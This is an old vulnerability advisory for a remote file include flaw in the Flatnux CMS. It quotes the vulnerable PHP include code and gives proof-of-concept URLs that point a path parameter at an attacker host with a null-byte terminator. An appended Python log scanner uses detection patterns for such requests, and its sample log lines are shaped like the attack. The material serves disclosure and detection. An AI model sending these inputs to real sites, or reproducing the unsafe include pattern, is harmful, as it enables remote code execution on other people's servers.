flatnux Flatnux-2009-01-27 Remote File Include

2009-02-05T00:00:00
ID SECURITYVULNS:DOC:21295
Type securityvulns
Reporter Securityvulns
Modified 2009-02-05T00:00:00

Description

@ flatnux Flatnux-2009-01-27 RFI dependencies P + Alfons Luja + 2009 + grts : All friends

VULN : +++ include/theme.php ... <?php if (eregi("theme.php", $_SERVER['PHP_SELF'])) die(); // 0 <-- I dont give a fuck

         global $theme, $_FNROOTPATH,$lang;   //<-- 1
         global $forumback, $forumborder;
         $_FN['table_background']=&$forumback;
         $_FN['table_border']=&$forumborder;


         if ($forumback=="" && $forumborder==""){
            $forumback="ffffff";
            $forumborder="000000";
            }
            require_once ($_FNROOTPATH . "themes/$theme/theme.php");

         /*------- Functions that theme.php may redefine --------------*/
     //......
  +++ /flatnux.php line 116:

       //$_FNROOTPATH still has no value
       include_once "./include/theme.php";   //-- 2

  +++ /filemanager.php
      include "./include/flatnux.php"; // -- RFI

p0c: http://localhost/~flatnux/index.php?_FNROOTPATH=[EVIL]%00
http://localhost/~flatnux/filemanager.php?mod=&op=&dir=/&opmod=newfile&filemanager_editor=tfuj_stary&_FNROOTPATH=[EVIl]%OO ... etc. ...

--http://www.wrzuta.pl/audio/xLyg0zckZS/-- #EOF lol
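The advisory's mechanism is a request parameter (here `_FNROOTPATH`) that reaches `require_once` unset, so a remote URL plus a `%00` terminator becomes the include path. The script below is an added example, not code from the advisory or from flatnux: it scans combined-format web access logs and flags any query parameter whose value is a URL or carries a null byte, which is the signature both PoC lines share. It generalises beyond `_FNROOTPATH` to every parameter, since the same pattern applies to any include-path parameter. The log lines, IP addresses and paths are constructed for the example; the host `203.0.113.5` is a reserved documentation address, not a real one.

```python
"""Flag HTTP requests that look like remote-file-include (RFI) attempts.

Added example, not part of the flatnux advisory or the flatnux project.
It assumes Apache/nginx combined-format access logs and checks every query
parameter for the two signs the advisory relies on: a value that is a URL
(http://, ftp://, php://, data: and similar wrappers include() will fetch
when allow_url_include is on) or a value carrying a null byte (%00), used
to cut off the path the application appends after the parameter.
"""
import re
from urllib.parse import urlsplit, parse_qsl

# Combined log format: host ident user [time] "METHOD TARGET PROTO" status ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Schemes and PHP stream wrappers that turn an include into a remote fetch.
SCHEME_RE = re.compile(
    r'^\s*(?:(?:https?|ftps?|phar|php|expect)://|data:)', re.IGNORECASE
)


def suspicious_params(target):
    """Return a list of (param, reason) pairs for one request target."""
    findings = []
    query = urlsplit(target).query
    # parse_qsl percent-decodes once, so %00 arrives here as a real NUL byte;
    # keep_blank_values preserves empty params such as mod= and op=.
    for name, value in parse_qsl(query, keep_blank_values=True):
        if '\x00' in value:
            findings.append((name, 'null byte'))
        if SCHEME_RE.match(value):
            findings.append((name, 'remote url'))
    return findings


def scan_log(lines):
    """Return [(ip, target, findings)] for every request with suspicious params."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # malformed or non-combined line: skip rather than crash
        findings = suspicious_params(m.group('target'))
        if findings:
            hits.append((m.group('ip'), m.group('target'), findings))
    return hits


# Constructed sample log (not real traffic): one benign page view, two
# requests shaped like the advisory's PoC lines, and one ordinary query.
SAMPLE_LOG = """\
198.51.100.7 - - [05/Feb/2009:10:00:01 +0000] "GET /~flatnux/index.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
198.51.100.7 - - [05/Feb/2009:10:00:02 +0000] "GET /~flatnux/index.php?_FNROOTPATH=http://203.0.113.5/t.txt%00 HTTP/1.1" 200 812 "-" "Mozilla/5.0"
198.51.100.9 - - [05/Feb/2009:10:00:03 +0000] "GET /~flatnux/filemanager.php?mod=&op=&dir=/&opmod=newfile&_FNROOTPATH=/var/www/x%00 HTTP/1.1" 200 812 "-" "curl/7.18"
192.0.2.4 - - [05/Feb/2009:10:00:04 +0000] "GET /~flatnux/index.php?mod=news&theme=default HTTP/1.1" 200 4096 "-" "Mozilla/5.0"
""".splitlines()


if __name__ == '__main__':
    for ip, target, findings in scan_log(SAMPLE_LOG):
        reasons = ', '.join(f'{name}: {why}' for name, why in findings)
        print(f'{ip} {target} -> {reasons}')
```

Two design points: the scanner flags the null byte on its own, because the second PoC line works with a local path and no URL at all, so matching only on `http://` would miss it; and it does not special-case `_FNROOTPATH`, since the bug is that any global the script reads before assigning can be set from the request (the classic register_globals pattern), so a fix that renames the variable leaves the same detection signature. On the application side the durable mitigation is to never build an include path from request-controlled data: assign `$_FNROOTPATH` from a constant before `include/theme.php` is reached and restrict `$theme` to a whitelist of directory names.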